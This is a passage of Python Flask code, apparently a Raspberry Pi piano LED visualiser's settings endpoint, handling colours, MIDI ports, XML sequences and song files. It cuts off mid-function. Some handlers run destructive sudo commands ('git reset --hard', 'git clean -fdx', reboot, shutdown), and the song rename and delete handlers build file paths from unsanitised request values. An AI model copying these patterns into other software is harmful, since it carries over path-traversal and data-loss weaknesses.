\"fading_speed\" or setting_name == \"velocity_speed\":\n webinterface.ledsettings.fadingspeed = int(value)\n webinterface.usersettings.change_setting_value(\"fadingspeed\", webinterface.ledsettings.fadingspeed)\n\n if setting_name == \"brightness\":\n webinterface.usersettings.change_setting_value(\"brightness_percent\", int(value))\n webinterface.ledstrip.change_brightness(int(value), True)\n\n if setting_name == \"backlight_brightness\":\n webinterface.ledsettings.backlight_brightness_percent = int(value)\n webinterface.ledsettings.backlight_brightness = 255 * webinterface.ledsettings.backlight_brightness_percent / 100\n webinterface.usersettings.change_setting_value(\"backlight_brightness\",\n int(webinterface.ledsettings.backlight_brightness))\n webinterface.usersettings.change_setting_value(\"backlight_brightness_percent\",\n webinterface.ledsettings.backlight_brightness_percent)\n fastColorWipe(webinterface.ledstrip.strip, True, webinterface.ledsettings)\n\n if setting_name == \"backlight_color\":\n rgb = wc.hex_to_rgb(\"#\" + value)\n\n webinterface.ledsettings.backlight_red = rgb[0]\n webinterface.ledsettings.backlight_green = rgb[1]\n webinterface.ledsettings.backlight_blue = rgb[2]\n\n webinterface.usersettings.change_setting_value(\"backlight_red\", rgb[0])\n 
webinterface.usersettings.change_setting_value(\"backlight_green\", rgb[1])\n webinterface.usersettings.change_setting_value(\"backlight_blue\", rgb[2])\n\n fastColorWipe(webinterface.ledstrip.strip, True, webinterface.ledsettings)\n\n if setting_name == \"sides_color\":\n rgb = wc.hex_to_rgb(\"#\" + value)\n\n webinterface.ledsettings.adjacent_red = rgb[0]\n webinterface.ledsettings.adjacent_green = rgb[1]\n webinterface.ledsettings.adjacent_blue = rgb[2]\n\n webinterface.usersettings.change_setting_value(\"adjacent_red\", rgb[0])\n webinterface.usersettings.change_setting_value(\"adjacent_green\", rgb[1])\n webinterface.usersettings.change_setting_value(\"adjacent_blue\", rgb[2])\n\n if setting_name == \"sides_color_mode\":\n webinterface.ledsettings.adjacent_mode = value\n webinterface.usersettings.change_setting_value(\"adjacent_mode\", value)\n\n if setting_name == \"input_port\":\n webinterface.usersettings.change_setting_value(\"input_port\", value)\n webinterface.midiports.change_port(\"inport\", value)\n\n if setting_name == \"secondary_input_port\":\n webinterface.usersettings.change_setting_value(\"secondary_input_port\", value)\n\n if setting_name == \"play_port\":\n webinterface.usersettings.change_setting_value(\"play_port\", value)\n webinterface.midiports.change_port(\"playport\", value)\n\n if setting_name == \"skipped_notes\":\n webinterface.usersettings.change_setting_value(\"skipped_notes\", value)\n webinterface.ledsettings.skipped_notes = value\n\n if setting_name == \"add_note_offset\":\n webinterface.ledsettings.add_note_offset()\n return jsonify(success=True, reload=True)\n\n if setting_name == \"append_note_offset\":\n webinterface.ledsettings.append_note_offset()\n return jsonify(success=True, reload=True)\n\n if setting_name == \"remove_note_offset\":\n webinterface.ledsettings.del_note_offset(int(value) + 1)\n return jsonify(success=True, reload=True)\n\n if setting_name == \"note_offsets\":\n webinterface.usersettings.change_setting_value(\"note_offsets\", value)\n\n if setting_name == \"update_note_offset\":\n webinterface.ledsettings.update_note_offset(int(value) + 1, second_value)\n return jsonify(success=True, reload=True)\n\n if setting_name == \"led_count\":\n webinterface.usersettings.change_setting_value(\"led_count\", int(value))\n webinterface.ledstrip.change_led_count(int(value), True)\n\n if setting_name == \"shift\":\n webinterface.usersettings.change_setting_value(\"shift\", int(value))\n webinterface.ledstrip.change_shift(int(value), True)\n\n if setting_name == \"reverse\":\n webinterface.usersettings.change_setting_value(\"reverse\", int(value))\n webinterface.ledstrip.change_reverse(int(value), True)\n\n if setting_name == \"color_mode\":\n reload_sequence = True\n if (second_value == \"no_reload\"):\n reload_sequence = False\n\n webinterface.ledsettings.color_mode = value\n webinterface.usersettings.change_setting_value(\"color_mode\", webinterface.ledsettings.color_mode)\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"add_multicolor\":\n webinterface.ledsettings.addcolor()\n return jsonify(success=True, reload=True)\n\n if setting_name == \"add_multicolor_and_set_value\":\n settings = json.loads(value)\n\n webinterface.ledsettings.multicolor.clear()\n webinterface.ledsettings.multicolor_range.clear()\n\n for key, value in settings.items():\n rgb = wc.hex_to_rgb(\"#\" + value[\"color\"])\n\n webinterface.ledsettings.multicolor.append([int(rgb[0]), int(rgb[1]), int(rgb[2])])\n 
webinterface.ledsettings.multicolor_range.append([int(value[\"range\"][0]), int(value[\"range\"][1])])\n\n webinterface.usersettings.change_setting_value(\"multicolor\", webinterface.ledsettings.multicolor)\n webinterface.usersettings.change_setting_value(\"multicolor_range\",\n webinterface.ledsettings.multicolor_range)\n\n return jsonify(success=True)\n\n if setting_name == \"remove_multicolor\":\n webinterface.ledsettings.deletecolor(int(value) + 1)\n return jsonify(success=True, reload=True)\n\n if setting_name == \"multicolor\":\n rgb = wc.hex_to_rgb(\"#\" + value)\n webinterface.ledsettings.multicolor[int(second_value)][0] = rgb[0]\n webinterface.ledsettings.multicolor[int(second_value)][1] = rgb[1]\n webinterface.ledsettings.multicolor[int(second_value)][2] = rgb[2]\n\n webinterface.usersettings.change_setting_value(\"multicolor\", webinterface.ledsettings.multicolor)\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"multicolor_range_left\":\n webinterface.ledsettings.multicolor_range[int(second_value)][0] = int(value)\n webinterface.usersettings.change_setting_value(\"multicolor_range\", webinterface.ledsettings.multicolor_range)\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"multicolor_range_right\":\n webinterface.ledsettings.multicolor_range[int(second_value)][1] = int(value)\n webinterface.usersettings.change_setting_value(\"multicolor_range\", webinterface.ledsettings.multicolor_range)\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"remove_all_multicolors\":\n webinterface.ledsettings.multicolor.clear()\n webinterface.ledsettings.multicolor_range.clear()\n\n webinterface.usersettings.change_setting_value(\"multicolor\", webinterface.ledsettings.multicolor)\n webinterface.usersettings.change_setting_value(\"multicolor_range\", webinterface.ledsettings.multicolor_range)\n return jsonify(success=True)\n\n if setting_name == \"rainbow_offset\":\n webinterface.ledsettings.rainbow_offset = int(value)\n webinterface.usersettings.change_setting_value(\"rainbow_offset\",\n int(webinterface.ledsettings.rainbow_offset))\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"rainbow_scale\":\n webinterface.ledsettings.rainbow_scale = int(value)\n webinterface.usersettings.change_setting_value(\"rainbow_scale\",\n int(webinterface.ledsettings.rainbow_scale))\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"rainbow_timeshift\":\n webinterface.ledsettings.rainbow_timeshift = int(value)\n webinterface.usersettings.change_setting_value(\"rainbow_timeshift\",\n int(webinterface.ledsettings.rainbow_timeshift))\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"speed_slowest_color\":\n rgb = wc.hex_to_rgb(\"#\" + value)\n webinterface.ledsettings.speed_slowest[\"red\"] = rgb[0]\n webinterface.ledsettings.speed_slowest[\"green\"] = rgb[1]\n webinterface.ledsettings.speed_slowest[\"blue\"] = rgb[2]\n\n webinterface.usersettings.change_setting_value(\"speed_slowest_red\", rgb[0])\n webinterface.usersettings.change_setting_value(\"speed_slowest_green\", rgb[1])\n webinterface.usersettings.change_setting_value(\"speed_slowest_blue\", rgb[2])\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"speed_fastest_color\":\n rgb = wc.hex_to_rgb(\"#\" + value)\n webinterface.ledsettings.speed_fastest[\"red\"] = rgb[0]\n 
webinterface.ledsettings.speed_fastest[\"green\"] = rgb[1]\n webinterface.ledsettings.speed_fastest[\"blue\"] = rgb[2]\n\n webinterface.usersettings.change_setting_value(\"speed_fastest_red\", rgb[0])\n webinterface.usersettings.change_setting_value(\"speed_fastest_green\", rgb[1])\n webinterface.usersettings.change_setting_value(\"speed_fastest_blue\", rgb[2])\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"gradient_start_color\":\n rgb = wc.hex_to_rgb(\"#\" + value)\n webinterface.ledsettings.gradient_start[\"red\"] = rgb[0]\n webinterface.ledsettings.gradient_start[\"green\"] = rgb[1]\n webinterface.ledsettings.gradient_start[\"blue\"] = rgb[2]\n\n webinterface.usersettings.change_setting_value(\"gradient_start_red\", rgb[0])\n webinterface.usersettings.change_setting_value(\"gradient_start_green\", rgb[1])\n webinterface.usersettings.change_setting_value(\"gradient_start_blue\", rgb[2])\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"gradient_end_color\":\n rgb = wc.hex_to_rgb(\"#\" + value)\n webinterface.ledsettings.gradient_end[\"red\"] = rgb[0]\n webinterface.ledsettings.gradient_end[\"green\"] = rgb[1]\n webinterface.ledsettings.gradient_end[\"blue\"] = rgb[2]\n\n webinterface.usersettings.change_setting_value(\"gradient_end_red\", rgb[0])\n webinterface.usersettings.change_setting_value(\"gradient_end_green\", rgb[1])\n webinterface.usersettings.change_setting_value(\"gradient_end_blue\", rgb[2])\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"speed_max_notes\":\n webinterface.ledsettings.speed_max_notes = int(value)\n webinterface.usersettings.change_setting_value(\"speed_max_notes\", int(value))\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"speed_period_in_seconds\":\n webinterface.ledsettings.speed_period_in_seconds = float(value)\n webinterface.usersettings.change_setting_value(\"speed_period_in_seconds\", float(value))\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"key_in_scale_color\":\n rgb = wc.hex_to_rgb(\"#\" + value)\n webinterface.ledsettings.key_in_scale[\"red\"] = rgb[0]\n webinterface.ledsettings.key_in_scale[\"green\"] = rgb[1]\n webinterface.ledsettings.key_in_scale[\"blue\"] = rgb[2]\n\n webinterface.usersettings.change_setting_value(\"key_in_scale_red\", rgb[0])\n webinterface.usersettings.change_setting_value(\"key_in_scale_green\", rgb[1])\n webinterface.usersettings.change_setting_value(\"key_in_scale_blue\", rgb[2])\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"key_not_in_scale_color\":\n rgb = wc.hex_to_rgb(\"#\" + value)\n webinterface.ledsettings.key_not_in_scale[\"red\"] = rgb[0]\n webinterface.ledsettings.key_not_in_scale[\"green\"] = rgb[1]\n webinterface.ledsettings.key_not_in_scale[\"blue\"] = rgb[2]\n\n webinterface.usersettings.change_setting_value(\"key_not_in_scale_red\", rgb[0])\n webinterface.usersettings.change_setting_value(\"key_not_in_scale_green\", rgb[1])\n webinterface.usersettings.change_setting_value(\"key_not_in_scale_blue\", rgb[2])\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"scale_key\":\n webinterface.ledsettings.scale_key = int(value)\n webinterface.usersettings.change_setting_value(\"scale_key\", int(value))\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"next_step\":\n 
webinterface.ledsettings.set_sequence(0, 1, False)\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"set_sequence\":\n if (int(value) == 0):\n webinterface.ledsettings.__init__(webinterface.usersettings)\n webinterface.ledsettings.sequence_active = False\n else:\n webinterface.ledsettings.set_sequence(int(value) - 1, 0)\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"change_sequence_name\":\n sequences_tree = minidom.parse(\"sequences.xml\")\n sequence_to_edit = \"sequence_\" + str(value)\n\n sequences_tree.getElementsByTagName(sequence_to_edit)[\n 0].getElementsByTagName(\"settings\")[\n 0].getElementsByTagName(\"sequence_name\")[0].firstChild.nodeValue = str(second_value)\n\n pretty_save(\"sequences.xml\", sequences_tree)\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"change_step_value\":\n sequences_tree = minidom.parse(\"sequences.xml\")\n sequence_to_edit = \"sequence_\" + str(value)\n\n sequences_tree.getElementsByTagName(sequence_to_edit)[\n 0].getElementsByTagName(\"settings\")[\n 0].getElementsByTagName(\"next_step\")[0].firstChild.nodeValue = str(second_value)\n\n pretty_save(\"sequences.xml\", sequences_tree)\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"change_step_activation_method\":\n sequences_tree = minidom.parse(\"sequences.xml\")\n sequence_to_edit = \"sequence_\" + str(value)\n\n sequences_tree.getElementsByTagName(sequence_to_edit)[\n 0].getElementsByTagName(\"settings\")[\n 0].getElementsByTagName(\"control_number\")[0].firstChild.nodeValue = str(second_value)\n\n pretty_save(\"sequences.xml\", sequences_tree)\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"add_sequence\":\n sequences_tree = minidom.parse(\"sequences.xml\")\n\n sequences_amount = 1\n while True:\n if (len(sequences_tree.getElementsByTagName(\"sequence_\" + str(sequences_amount))) == 0):\n break\n sequences_amount += 1\n\n settings = sequences_tree.createElement(\"settings\")\n\n control_number = sequences_tree.createElement(\"control_number\")\n control_number.appendChild(sequences_tree.createTextNode(\"0\"))\n settings.appendChild(control_number)\n\n next_step = sequences_tree.createElement(\"next_step\")\n next_step.appendChild(sequences_tree.createTextNode(\"1\"))\n settings.appendChild(next_step)\n\n sequence_name = sequences_tree.createElement(\"sequence_name\")\n sequence_name.appendChild(sequences_tree.createTextNode(\"Sequence \" + str(sequences_amount)))\n settings.appendChild(sequence_name)\n\n step = sequences_tree.createElement(\"step_1\")\n\n color = sequences_tree.createElement(\"color\")\n color.appendChild(sequences_tree.createTextNode(\"RGB\"))\n step.appendChild(color)\n\n red = sequences_tree.createElement(\"Red\")\n red.appendChild(sequences_tree.createTextNode(\"255\"))\n step.appendChild(red)\n\n green = sequences_tree.createElement(\"Green\")\n green.appendChild(sequences_tree.createTextNode(\"255\"))\n step.appendChild(green)\n\n blue = sequences_tree.createElement(\"Blue\")\n blue.appendChild(sequences_tree.createTextNode(\"255\"))\n step.appendChild(blue)\n\n light_mode = sequences_tree.createElement(\"light_mode\")\n light_mode.appendChild(sequences_tree.createTextNode(\"Normal\"))\n step.appendChild(light_mode)\n\n element = sequences_tree.createElement(\"sequence_\" + str(sequences_amount))\n element.appendChild(settings)\n element.appendChild(step)\n\n 
sequences_tree.getElementsByTagName(\"list\")[0].appendChild(element)\n\n pretty_save(\"sequences.xml\", sequences_tree)\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"remove_sequence\":\n sequences_tree = minidom.parse(\"sequences.xml\")\n\n # removing sequence node\n nodes = sequences_tree.getElementsByTagName(\"sequence_\" + str(value))\n for node in nodes:\n parent = node.parentNode\n parent.removeChild(node)\n\n # changing nodes tag names\n i = 1\n for sequence in sequences_tree.getElementsByTagName(\"list\")[0].childNodes:\n if (sequence.nodeType == 1):\n sequences_tree.getElementsByTagName(sequence.nodeName)[0].tagName = \"sequence_\" + str(i)\n i += 1\n\n pretty_save(\"sequences.xml\", sequences_tree)\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n if setting_name == \"add_step\":\n sequences_tree = minidom.parse(\"sequences.xml\")\n\n step_amount = 1\n while True:\n if (len(sequences_tree.getElementsByTagName(\"sequence_\" + str(value))[0].getElementsByTagName(\n \"step_\" + str(step_amount))) == 0):\n break\n step_amount += 1\n\n step = sequences_tree.createElement(\"step_\" + str(step_amount))\n\n color = sequences_tree.createElement(\"color\")\n\n color.appendChild(sequences_tree.createTextNode(\"RGB\"))\n step.appendChild(color)\n\n red = sequences_tree.createElement(\"Red\")\n red.appendChild(sequences_tree.createTextNode(\"255\"))\n step.appendChild(red)\n\n green = sequences_tree.createElement(\"Green\")\n green.appendChild(sequences_tree.createTextNode(\"255\"))\n step.appendChild(green)\n\n blue = sequences_tree.createElement(\"Blue\")\n blue.appendChild(sequences_tree.createTextNode(\"255\"))\n step.appendChild(blue)\n\n light_mode = sequences_tree.createElement(\"light_mode\")\n light_mode.appendChild(sequences_tree.createTextNode(\"Normal\"))\n step.appendChild(light_mode)\n\n sequences_tree.getElementsByTagName(\"sequence_\" + str(value))[0].appendChild(step)\n\n pretty_save(\"sequences.xml\", sequences_tree)\n\n return jsonify(success=True, reload_sequence=reload_sequence, reload_steps_list=True)\n\n # remove node list with a tag name \"step_\" + str(value), and change tag names to maintain order\n if setting_name == \"remove_step\":\n\n second_value = int(second_value)\n second_value += 1\n\n sequences_tree = minidom.parse(\"sequences.xml\")\n\n # removing step node\n nodes = sequences_tree.getElementsByTagName(\"sequence_\" + str(value))[0].getElementsByTagName(\n \"step_\" + str(second_value))\n for node in nodes:\n parent = node.parentNode\n parent.removeChild(node)\n\n # changing nodes tag names\n i = 1\n for step in sequences_tree.getElementsByTagName(\"sequence_\" + str(value))[0].childNodes:\n if (step.nodeType == 1 and step.tagName != \"settings\"):\n sequences_tree.getElementsByTagName(\"sequence_\" + str(value))[0].getElementsByTagName(step.nodeName)[\n 0].tagName = \"step_\" + str(i)\n i += 1\n\n pretty_save(\"sequences.xml\", sequences_tree)\n\n return jsonify(success=True, reload_sequence=reload_sequence)\n\n # saving current led settings as sequence step\n if setting_name == \"save_led_settings_to_step\" and second_value != \"\":\n\n # remove node and child under \"sequence_\" + str(value) and \"step_\" + str(second_value)\n sequences_tree = minidom.parse(\"sequences.xml\")\n\n second_value = int(second_value)\n second_value += 1\n\n nodes = sequences_tree.getElementsByTagName(\"sequence_\" + str(value))[0].getElementsByTagName(\n \"step_\" + str(second_value))\n for node in nodes:\n 
parent = node.parentNode\n parent.removeChild(node)\n\n # create new step node\n step = sequences_tree.createElement(\"step_\" + str(second_value))\n\n # load color mode from webinterface.ledsettings and put it into step node\n color_mode = sequences_tree.createElement(\"color\")\n color_mode.appendChild(sequences_tree.createTextNode(str(webinterface.ledsettings.color_mode)))\n step.appendChild(color_mode)\n\n # load mode from webinterface.ledsettings and put it into step node\n mode = sequences_tree.createElement(\"light_mode\")\n mode.appendChild(sequences_tree.createTextNode(str(webinterface.ledsettings.mode)))\n step.appendChild(mode)\n\n # if mode is equal \"Fading\" or \"Velocity\" load mode from webinterface.ledsettings and put it into step node\n if (webinterface.ledsettings.mode == \"Fading\" or webinterface.ledsettings.mode == \"Velocity\"):\n fadingspeed = sequences_tree.createElement(\"fadingspeed\")\n\n # depending on fadingspeed name set different fadingspeed value\n if (webinterface.ledsettings.fadingspeed == \"Slow\"):\n fadingspeed.appendChild(sequences_tree.createTextNode(\"10\"))\n elif (webinterface.ledsettings.fadingspeed == \"Medium\"):\n fadingspeed.appendChild(sequences_tree.createTextNode(\"20\"))\n elif (webinterface.ledsettings.fadingspeed == \"Fast\"):\n fadingspeed.appendChild(sequences_tree.createTextNode(\"40\"))\n elif (webinterface.ledsettings.fadingspeed == \"Very fast\"):\n fadingspeed.appendChild(sequences_tree.createTextNode(\"50\"))\n elif (webinterface.ledsettings.fadingspeed == \"Instant\"):\n fadingspeed.appendChild(sequences_tree.createTextNode(\"1000\"))\n elif (webinterface.ledsettings.fadingspeed == \"Very slow\"):\n fadingspeed.appendChild(sequences_tree.createTextNode(\"2\"))\n\n step.appendChild(fadingspeed)\n\n # if color_mode is equal to \"Single\" load color from webinterface.ledsettings and put it into step node\n if (webinterface.ledsettings.color_mode == \"Single\"):\n red = sequences_tree.createElement(\"Red\")\n red.appendChild(sequences_tree.createTextNode(str(webinterface.ledsettings.red)))\n step.appendChild(red)\n\n green = sequences_tree.createElement(\"Green\")\n green.appendChild(sequences_tree.createTextNode(str(webinterface.ledsettings.green)))\n step.appendChild(green)\n\n blue = sequences_tree.createElement(\"Blue\")\n blue.appendChild(sequences_tree.createTextNode(str(webinterface.ledsettings.blue)))\n step.appendChild(blue)\n\n # if color_mode is equal to \"Multicolor\" load colors from webinterface.ledsettings and put it into step node\n if (webinterface.ledsettings.color_mode == \"Multicolor\"):\n # load value from webinterface.ledsettings.multicolor\n multicolor = webinterface.ledsettings.multicolor\n\n # loop through multicolor object and add each color to step node under \"sequence_\"+str(value) with tag name \"color_\"+str(i)\n for i in range(len(multicolor)):\n color = sequences_tree.createElement(\"color_\" + str(i + 1))\n new_multicolor = str(multicolor[i])\n new_multicolor = new_multicolor.replace(\"[\", \"\")\n new_multicolor = new_multicolor.replace(\"]\", \"\")\n\n color.appendChild(sequences_tree.createTextNode(new_multicolor))\n step.appendChild(color)\n\n # same as above but with multicolor_range and \"color_range_\"+str(i)\n multicolor_range = webinterface.ledsettings.multicolor_range\n for i in range(len(multicolor_range)):\n color_range = sequences_tree.createElement(\"color_range_\" + str(i + 1))\n new_multicolor_range = str(multicolor_range[i])\n\n new_multicolor_range = 
new_multicolor_range.replace(\"[\", \"\")\n new_multicolor_range = new_multicolor_range.replace(\"]\", \"\")\n color_range.appendChild(sequences_tree.createTextNode(new_multicolor_range))\n step.appendChild(color_range)\n\n # if color_mode is equal to \"Rainbow\" load colors from webinterface.ledsettings and put it into step node\n if (webinterface.ledsettings.color_mode == \"Rainbow\"):\n # load values rainbow_offset, rainbow_scale and rainbow_timeshift from webinterface.ledsettings and put them into step node under Offset, Scale and Timeshift\n rainbow_offset = sequences_tree.createElement(\"Offset\")\n rainbow_offset.appendChild(sequences_tree.createTextNode(str(webinterface.ledsettings.rainbow_offset)))\n step.appendChild(rainbow_offset)\n\n rainbow_scale = sequences_tree.createElement(\"Scale\")\n rainbow_scale.appendChild(sequences_tree.createTextNode(str(webinterface.ledsettings.rainbow_scale)))\n step.appendChild(rainbow_scale)\n\n rainbow_timeshift = sequences_tree.createElement(\"Timeshift\")\n rainbow_timeshift.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.rainbow_timeshift)))\n step.appendChild(rainbow_timeshift)\n\n # if color_mode is equal to \"Speed\" load colors from webinterface.ledsettings and put it into step node\n if (webinterface.ledsettings.color_mode == \"Speed\"):\n # load values speed_slowest[\"red\"] etc from webinterface.ledsettings and put them under speed_slowest_red etc\n speed_slowest_red = sequences_tree.createElement(\"speed_slowest_red\")\n speed_slowest_red.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.speed_slowest[\"red\"])))\n step.appendChild(speed_slowest_red)\n\n speed_slowest_green = sequences_tree.createElement(\"speed_slowest_green\")\n speed_slowest_green.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.speed_slowest[\"green\"])))\n step.appendChild(speed_slowest_green)\n\n speed_slowest_blue = sequences_tree.createElement(\"speed_slowest_blue\")\n speed_slowest_blue.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.speed_slowest[\"blue\"])))\n step.appendChild(speed_slowest_blue)\n\n # same as above but with \"fastest\"\n speed_fastest_red = sequences_tree.createElement(\"speed_fastest_red\")\n speed_fastest_red.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.speed_fastest[\"red\"])))\n step.appendChild(speed_fastest_red)\n\n speed_fastest_green = sequences_tree.createElement(\"speed_fastest_green\")\n speed_fastest_green.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.speed_fastest[\"green\"])))\n step.appendChild(speed_fastest_green)\n\n speed_fastest_blue = sequences_tree.createElement(\"speed_fastest_blue\")\n speed_fastest_blue.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.speed_fastest[\"blue\"])))\n step.appendChild(speed_fastest_blue)\n\n # load \"speed_max_notes\" and \"speed_period_in_seconds\" values from webinterface.ledsettings\n # and put them under speed_max_notes and speed_period_in_seconds\n\n speed_max_notes = sequences_tree.createElement(\"speed_max_notes\")\n speed_max_notes.appendChild(sequences_tree.createTextNode(str(webinterface.ledsettings.speed_max_notes)))\n step.appendChild(speed_max_notes)\n\n speed_period_in_seconds = sequences_tree.createElement(\"speed_period_in_seconds\")\n speed_period_in_seconds.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.speed_period_in_seconds)))\n 
step.appendChild(speed_period_in_seconds)\n\n # if color_mode is equal to \"Gradient\" load colors from webinterface.ledsettings and put it into step node\n if (webinterface.ledsettings.color_mode == \"Gradient\"):\n # load values gradient_start_red etc from webinterface.ledsettings and put them under gradient_start_red etc\n gradient_start_red = sequences_tree.createElement(\"gradient_start_red\")\n gradient_start_red.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.gradient_start[\"red\"])))\n step.appendChild(gradient_start_red)\n\n gradient_start_green = sequences_tree.createElement(\"gradient_start_green\")\n gradient_start_green.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.gradient_start[\"green\"])))\n step.appendChild(gradient_start_green)\n\n gradient_start_blue = sequences_tree.createElement(\"gradient_start_blue\")\n gradient_start_blue.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.gradient_start[\"blue\"])))\n step.appendChild(gradient_start_blue)\n\n # same as above but with gradient_end\n gradient_end_red = sequences_tree.createElement(\"gradient_end_red\")\n gradient_end_red.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.gradient_end[\"red\"])))\n step.appendChild(gradient_end_red)\n\n gradient_end_green = sequences_tree.createElement(\"gradient_end_green\")\n gradient_end_green.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.gradient_end[\"green\"])))\n step.appendChild(gradient_end_green)\n\n gradient_end_blue = sequences_tree.createElement(\"gradient_end_blue\")\n gradient_end_blue.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.gradient_end[\"blue\"])))\n step.appendChild(gradient_end_blue)\n\n # if color_mode is equal to \"Scale\" load colors from webinterface.ledsettings and put it into step node\n if (webinterface.ledsettings.color_mode == \"Scale\"):\n # load values key_in_scale_red etc from webinterface.ledsettings and put them under key_in_scale_red etc\n key_in_scale_red = sequences_tree.createElement(\"key_in_scale_red\")\n key_in_scale_red.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.key_in_scale[\"red\"])))\n step.appendChild(key_in_scale_red)\n\n key_in_scale_green = sequences_tree.createElement(\"key_in_scale_green\")\n key_in_scale_green.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.key_in_scale[\"green\"])))\n step.appendChild(key_in_scale_green)\n\n key_in_scale_blue = sequences_tree.createElement(\"key_in_scale_blue\")\n key_in_scale_blue.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.key_in_scale[\"blue\"])))\n step.appendChild(key_in_scale_blue)\n\n # same as above but with key_not_in_scale\n key_not_in_scale_red = sequences_tree.createElement(\"key_not_in_scale_red\")\n key_not_in_scale_red.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.key_not_in_scale[\"red\"])))\n step.appendChild(key_not_in_scale_red)\n\n key_not_in_scale_green = sequences_tree.createElement(\"key_not_in_scale_green\")\n key_not_in_scale_green.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.key_not_in_scale[\"green\"])))\n step.appendChild(key_not_in_scale_green)\n\n key_not_in_scale_blue = sequences_tree.createElement(\"key_not_in_scale_blue\")\n key_not_in_scale_blue.appendChild(\n sequences_tree.createTextNode(str(webinterface.ledsettings.key_not_in_scale[\"blue\"])))\n 
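# Attach the final Scale-mode color component to the rebuilt step.\n 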
step.appendChild(key_not_in_scale_blue)\n\n try:\n sequences_tree.getElementsByTagName(\"sequence_\" + str(value))[\n 0].insertBefore(step,\n sequences_tree.getElementsByTagName(\"sequence_\" + str(value))[\n 0].getElementsByTagName(\"step_\" + str(second_value + 1))[0])\n except:\n sequences_tree.getElementsByTagName(\"sequence_\" + str(value))[0].appendChild(step)\n\n pretty_save(\"sequences.xml\", sequences_tree)\n\n return jsonify(success=True, reload_sequence=reload_sequence, reload_steps_list=True)\n\n if setting_name == \"screen_on\":\n if (int(value) == 0):\n webinterface.menu.disable_screen()\n else:\n webinterface.menu.enable_screen()\n\n if setting_name == \"reset_to_default\":\n webinterface.usersettings.reset_to_default()\n\n if setting_name == \"restart_rpi\":\n call(\"sudo /sbin/reboot now\", shell=True)\n\n if setting_name == \"turnoff_rpi\":\n call(\"sudo /sbin/shutdown -h now\", shell=True)\n\n if setting_name == \"update_rpi\":\n call(\"sudo git reset --hard HEAD\", shell=True)\n call(\"sudo git checkout .\", shell=True)\n call(\"sudo git clean -fdx\", shell=True)\n call(\"sudo git pull origin master\", shell=True)\n\n if setting_name == \"connect_ports\":\n webinterface.midiports.connectall()\n return jsonify(success=True, reload_ports=True)\n\n if setting_name == \"disconnect_ports\":\n call(\"sudo aconnect -x\", shell=True)\n return jsonify(success=True, reload_ports=True)\n\n if setting_name == \"restart_rtp\":\n call(\"sudo systemctl restart rtpmidid\", shell=True)\n\n if setting_name == \"start_recording\":\n webinterface.saving.start_recording()\n return jsonify(success=True, reload_songs=True)\n\n if setting_name == \"cancel_recording\":\n webinterface.saving.cancel_recording()\n return jsonify(success=True, reload_songs=True)\n\n if setting_name == \"save_recording\":\n now = datetime.datetime.now()\n current_date = now.strftime(\"%Y-%m-%d %H:%M\")\n webinterface.saving.save(current_date)\n return jsonify(success=True, reload_songs=True)\n\n if setting_name == \"change_song_name\":\n if os.path.exists(\"Songs/\" + second_value):\n return jsonify(success=False, reload_songs=True, error=second_value + \" already exists\")\n\n if \"_main\" in value:\n search_name = value.replace(\"_main.mid\", \"\")\n for fname in os.listdir('Songs'):\n if search_name in fname:\n new_name = second_value.replace(\".mid\", \"\") + fname.replace(search_name, \"\")\n os.rename('Songs/' + fname, 'Songs/' + new_name)\n else:\n os.rename('Songs/' + value, 'Songs/' + second_value)\n os.rename('Songs/cache/' + value + \".p\", 'Songs/cache/' + second_value + \".p\")\n\n\n\n return jsonify(success=True, reload_songs=True)\n\n if setting_name == \"remove_song\":\n if \"_main\" in value:\n name_no_suffix = value.replace(\"_main.mid\", \"\")\n for fname in os.listdir('Songs'):\n if name_no_suffix in fname:\n os.remove(\"Songs/\" + fname)\n else:\n os.remove(\"Songs/\" + value)\n\n file_types = [\".musicxml\", \".xml\", \".mxl\", \".abc\"]\n for file_type in file_types:\n try:\n 